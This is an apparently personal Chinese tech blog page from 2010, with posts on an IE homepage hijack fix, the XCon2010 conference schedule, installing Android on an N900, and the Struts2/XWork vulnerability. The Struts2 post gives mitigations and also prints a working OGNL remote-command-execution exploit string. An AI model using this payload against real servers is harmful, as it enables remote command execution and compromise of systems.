VITTER'S BLOG

发腾讯企业邮箱邀请码了

有要的留下邮箱。

请评论正文内容里面留邮箱，不留邮箱的，我无法猜测，谢谢。

Posted by vitter at 2010-08-17 18:16:18 | 评论 (29) | 引用(0) | 分类:灌水历程

桌面上的IE被XXOO了

平时基本都不用IE的，估计是用Firefox的IEtab浏览过什么，导致双机桌面上的Internet Explorer打开主页是http://www.cnweb123.cn/?hao123。看了下IE属性设置的主页还是我默认的，而且发现用快捷方式和直接用iexplore.exe程序打开都是正常的，就用桌面的那个IE图标打开异常，一生气我就直接把桌面的IE图标给删掉了。

后来查了下注册表，发现[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]默认项被改成了"C:\Program Files\Internet Explorer\iexplore.exe" http://www.cnweb123.cn/?hao123，改回默认的"C:\Program Files\Internet Explorer\iexplore.exe" 就ok了。

另外恢复删除了的桌面上IE图标可以用下面几个方法：
1、打开“我的电脑”向上回到上一层“桌面”，把其中的Internet Explorer复制到桌面恢复。
2、或者在其他地方，只要不是桌面就行，创建一个Internet Explorer.{871C5380-42A0-1069-A2EA-08002B30309D}文件夹，然后把这个文件夹复制到桌面也可。
3、还有一种方法恢复，打开自定义桌面后，因为在SP3后就没IE的选项了，但是我们可以按i键然后确定，再确定就能恢复出来。
4、另外改注册表[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons \NewStartPanel]的{871C5380-42A0-1069-A2EA-08002B30309D}项为0也能恢复。

Posted by vitter at 2010-08-10 20:02:43 | 评论 (0) | 引用(0) | 分类:技术历程

XCON2010结束鸟

见了一些朋友，扯了一些蛋，瞅了一会娱乐，还有一个￥300的搞笑的MM的轶事。

会议日程

你们懂的

Posted by vitter at 2010-08-06 10:03:49 | 评论 (2) | 引用(0) | 分类:灌水历程

Struts2/XWork漏洞

这个漏洞出来有段时间了，一直忙没去看，当时出来的时候就有人测试说威力挺大，昨天看了下，确实是远程执行命令，很多tomcat都是root跑的，那用这个，等于直接就root权限远程执行命令了。

昨天有服务器有问题，都让他们排查了下。基本上没有裸跑tomcat的，限制可以在系统级做，nginx和haproxy都对含\u0023的参数提交禁掉就ok了。单独跑tomcat的可以写个过滤器，每个项目都加上：

<interceptor-ref name="params">
<param name="excludeParams">.*\\u0023.*</param>
</interceptor-ref>

比较麻烦。

官方已出补丁：

http://svn.apache.org/viewvc?view=revision&revision=956389

详情：http://vfocus.net/art/20100729/7509.html

exp：

('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exec("touch /tmp/vittertestok")')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

Posted by vitter at 2010-07-30 12:18:34 | 评论 (2) | 引用(0) | 分类:技术历程

XCon2010会议日程

---------------------------------------------------------------------------------------------------------------

2010-8-4 XCon2010 第一天

---------------------------------------------------------------------------------------------------------------

时间演讲者议题

---------------------------------------------------------------------------------------------------------------

07:30 - 09:00 注册

---------------------------------------------------------------------------------------------------------------

09:00 - 09:10 开幕词

---------------------------------------------------------------------------------------------------------------

09:10 - 10:10 Richard Stallman 软件专利的危害

---------------------------------------------------------------------------------------------------------------

10:10 - 10:30 茶歇

---------------------------------------------------------------------------------------------------------------

10:30 - 11:30 FlashSky 基于数据流SDL的安全测试

---------------------------------------------------------------------------------------------------------------

11:30 - 12:30 刘小珍 AVM2虚拟机逃逸技术研究

---------------------------------------------------------------------------------------------------------------

12:30 - 14:30 午餐

---------------------------------------------------------------------------------------------------------------

14:30 - 15:30 陈小波 & 谢君绕过windows 7 浏览器内存保护

---------------------------------------------------------------------------------------------------------------

15:30 - 16:00 茶歇

---------------------------------------------------------------------------------------------------------------

16:00 - 17:00 玩命虚拟化病毒感染

---------------------------------------------------------------------------------------------------------------

17:00 - 18:00 nEINEI 对抗AV检测--病毒遗传感染技术探索

---------------------------------------------------------------------------------------------------------------

2010-8-5 XCon2010 第二天

---------------------------------------------------------------------------------------------------------------

时间演讲者议题

---------------------------------------------------------------------------------------------------------------

09:00 - 10:00 John Lambert 影响未来开发的9种趋势

---------------------------------------------------------------------------------------------------------------

10:00 - 10:30 茶歇

---------------------------------------------------------------------------------------------------------------

10:30 - 11:30 于淼硬件虚拟化下的反调试手段软件保护

---------------------------------------------------------------------------------------------------------------

11:30 - 12:30 FunnyWei 深入剖析及挖掘PDF漏洞

---------------------------------------------------------------------------------------------------------------

12:30 - 14:30 午餐

---------------------------------------------------------------------------------------------------------------

14:30 - 15:30 安天实验室病毒分析流水线

---------------------------------------------------------------------------------------------------------------

15:30 - 16:00 茶歇

---------------------------------------------------------------------------------------------------------------

16:00 - 17:00 XCon2010 论坛

---------------------------------------------------------------------------------------------------------------

17:00 - 17:20 XCon2010 幸运抽奖

---------------------------------------------------------------------------------------------------------------

17:20 - 17:30 闭幕词

Posted by vitter at 2010-07-30 08:20:34 | 评论 (0) | 引用(0) | 分类:灌水历程

Android 2.2装到的N900上

Android 2.2装到了SD卡上双系统，等MeeGo有电话模块和UI界面了后也装SD卡上，弄个多系统引导。

Android 2.2 for N900目前支持：

Dual boot with Maemo 5
Sound (built-in speakers only)
Touchscreen input
Keyboard input
WiFi networking (beta)
Internal eMMC as SD with automount
Partial battery monitoring
Microphone (alpha)
LCD && keyboard backlight (beta)
Charging (beta, only with wall-charger)
Accelerometers (alpha)
Bluetooth

还不支持：

Phone
Vibrator
Proximity && light sensors
Unlock/Lock switch on the right side
2D gfx
3D gfx
GPS
FM Radio Transmitter
FM Radio Reciever
Camera, camera button

安装：会重新分区SD卡，格式化，我的fat分了2G，其他的都分了EXT3装系统用。

umount /dev/mmcblk1p1
sfdisk -uM /dev/mmcblk1 << EOF
,2048,C
,,L
,,
,,
EOF
umount /dev/mmcblk1p1
mkdosfs /dev/mmcblk1p1
sfdisk -R /dev/mmcblk1
mke2fs -j -m0 /dev/mmcblk1p2
apt-get -y install bzip2 wget
cd /home/user/MyDocs/
wget http://downloads.nitdroid.com/Jay-c/multiboot-0.1.1.tar.gz
cd /
tar xzvf /home/user/MyDocs/multiboot-0.1.1.tar.gz
mkdir /and
mount -o noatime,rw /dev/mmcblk1p2 /and
cd /home/user/MyDocs
wget http://downloads.nitdroid.com/NITDroid-N900-0.0.5-3-BIG.tbz2
cd /and
rm -rf *
bzip2 -d /home/user/MyDocs/NITDroid-N900-0.0.5-3-BIG.tbz2
tar xvf /home/user/MyDocs/NITDroid-N900-0.0.5-3-BIG -C /and